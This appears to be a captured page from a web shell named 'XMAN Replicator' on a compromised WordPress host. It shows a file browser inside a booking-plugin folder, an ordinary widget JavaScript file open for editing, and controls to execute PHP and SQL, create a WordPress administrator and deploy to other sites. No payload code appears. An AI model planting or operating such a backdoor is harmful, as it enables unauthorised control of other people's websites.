🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
home
/
rlinfolily
/
www
/
wp-content
/
plugins
/
dopbsp
/
assets
/
js
/
widgets
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwx---r-x
2015-09-08 18:32
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwx---r-x
2015-09-08 18:32
🔄
🗑️
🗑️📁
⬇️
🔒
backend-widgets.js
1,270 B
-rw----r--
2015-09-08 18:32
✏️
🔄
🗑️
⬇️
🔒
Edit: backend-widgets.js
/* * Title : Booking System PRO (WordPress Plugin) * Version : 2.0 * File : assets/js/backend-widgets.js * File Version : 1.0 * Created / Last Modified : 23 September 2014 * Author : Dot on Paper * Copyright : © 2012 Dot on Paper * Website : http://www.dotonpaper.net * Description : Booking System PRO back end widgets JavaScript class. */ var DOPBSPWidgets = new function(){ 'use strict'; /* * Private variables. */ var $ = jQuery.noConflict(); /* * Constructor */ this.DOPBSPWidgets = function(){ }; this.display = function(id, selection){ $('#DOPBSP-widget-id-'+id).css('display', 'none'); $('#DOPBSP-widget-lang-'+id).css('display', 'none'); switch (selection){ case 'calendar': $('#DOPBSP-widget-id-'+id).css('display', 'block'); $('#DOPBSP-widget-lang-'+id).css('display', 'block'); break; case 'sidebar': $('#DOPBSP-widget-id-'+id).css('display', 'block'); break; } }; return this.DOPBSPWidgets(); };
Save
PHP Console
Execute
SQL Console
Execute